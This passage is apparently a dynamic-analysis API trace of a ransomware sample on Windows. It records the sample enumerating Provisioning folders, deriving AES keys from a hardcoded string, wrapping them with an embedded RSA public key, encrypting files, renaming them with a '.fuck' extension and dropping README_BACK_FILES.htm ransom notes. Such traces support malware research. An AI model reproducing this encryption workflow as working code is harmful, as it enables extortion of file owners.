pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.118] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.118] CloseHandle (hObject=0xffffffff) returned 1 [0237.118] CloseHandle (hObject=0xffffffff) returned 1 [0237.118] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0237.118] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0237.119] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0237.119] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0237.119] CryptDestroyHash (hHash=0x2817758) returned 1 [0237.119] CryptDestroyKey (hKey=0x2817918) returned 1 [0237.119] CryptReleaseContext (hProv=0x2832d90, dwFlags=0x0) returned 1 [0237.119] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0237.119] FindClose (in: hFindFile=0x2817458 | out: hFindFile=0x2817458) returned 1 [0237.120] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0237.120] AreFileApisANSI () returned 1 [0237.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2832f28, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0237.120] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.120] GetLastError () returned 0x5 [0237.121] GetLastError () returned 0x5 [0237.121] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.121] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0237.121] GetLastError () returned 0x5 [0237.121] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml")) returned 0x20 [0237.121] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0237.121] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.122] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.122] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.122] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2832f28) returned 1 [0237.127] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0237.127] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.127] CryptHashData (hHash=0x2817458, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.127] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x2817458, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817918) returned 1 [0237.127] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.127] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0237.127] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2833500) returned 1 [0237.128] CryptImportPublicKeyInfo (in: hCryptProv=0x2833500, dwCertEncodingType=0x1, pInfo=0x283bd88*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283bdb8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283bdc0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817518) returned 1 [0237.128] CryptEncrypt (in: hKey=0x2817518, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0237.128] CryptEncrypt (in: hKey=0x2817518, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2832d90*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2832d90*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0237.129] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2832d90, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.129] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0237.129] CryptEncrypt (in: hKey=0x2817918, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0237.129] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.129] CloseHandle (hObject=0xffffffff) returned 1 [0237.129] CloseHandle (hObject=0xffffffff) returned 1 [0237.129] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0237.129] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0237.130] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml.gsg")) returned 0 [0237.130] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml.fuck")) returned 0 [0237.130] CryptDestroyHash (hHash=0x2817458) returned 1 [0237.130] CryptDestroyKey (hKey=0x2817918) returned 1 [0237.130] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.130] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0237.130] FindClose (in: hFindFile=0x2817298 | out: hFindFile=0x2817298) returned 1 [0237.131] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\readme_back_files.htm")) returned 0xffffffff [0237.131] AreFileApisANSI () returned 1 [0237.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0237.131] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.131] GetLastError () returned 0x5 [0237.131] GetLastError () returned 0x5 [0237.131] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.131] FindClose (in: hFindFile=0x2817098 | out: hFindFile=0x2817098) returned 1 [0237.132] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\readme_back_files.htm")) returned 0xffffffff [0237.132] AreFileApisANSI () returned 1 [0237.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0237.132] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.132] GetLastError () returned 0x5 [0237.132] GetLastError () returned 0x5 [0237.132] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.132] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2817298 [0237.133] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.133] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.133] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.133] GetLastError () returned 0x5 [0237.133] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml")) returned 0x20 [0237.134] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0237.134] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.134] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.134] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.135] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2832f28) returned 1 [0237.140] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.140] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.140] CryptHashData (hHash=0x2817098, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.140] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x2817098, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2817b98) returned 1 [0237.140] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.140] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.140] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28330c0) returned 1 [0237.141] CryptImportPublicKeyInfo (in: hCryptProv=0x28330c0, dwCertEncodingType=0x1, pInfo=0x283b3c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283b3f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283b400*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28175d8) returned 1 [0237.141] CryptEncrypt (in: hKey=0x28175d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.142] CryptEncrypt (in: hKey=0x28175d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2833ad8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2833ad8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.142] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2833ad8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.142] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.142] CryptEncrypt (in: hKey=0x2817b98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.142] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.142] CloseHandle (hObject=0xffffffff) returned 1 [0237.142] CloseHandle (hObject=0xffffffff) returned 1 [0237.142] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml"), bFailIfExists=0) returned 0 [0237.142] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0237.143] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.gsg")) returned 0 [0237.143] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.fuck")) returned 0 [0237.143] CryptDestroyHash (hHash=0x2817098) returned 1 [0237.143] CryptDestroyKey (hKey=0x2817b98) returned 1 [0237.143] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.143] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.143] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.144] GetLastError () returned 0x5 [0237.144] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml")) returned 0x20 [0237.144] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0237.145] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.145] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.145] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.145] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2832f28) returned 1 [0237.150] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.150] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.150] CryptHashData (hHash=0x2817458, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.150] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x2817458, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2817c18) returned 1 [0237.151] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.151] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.151] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2833b60) returned 1 [0237.152] CryptImportPublicKeyInfo (in: hCryptProv=0x2833b60, dwCertEncodingType=0x1, pInfo=0x283bbe8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283bc18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283bc20*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2817b18) returned 1 [0237.152] CryptEncrypt (in: hKey=0x2817b18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.152] CryptEncrypt (in: hKey=0x2817b18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2834138*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2834138*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.152] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2834138, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.152] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, 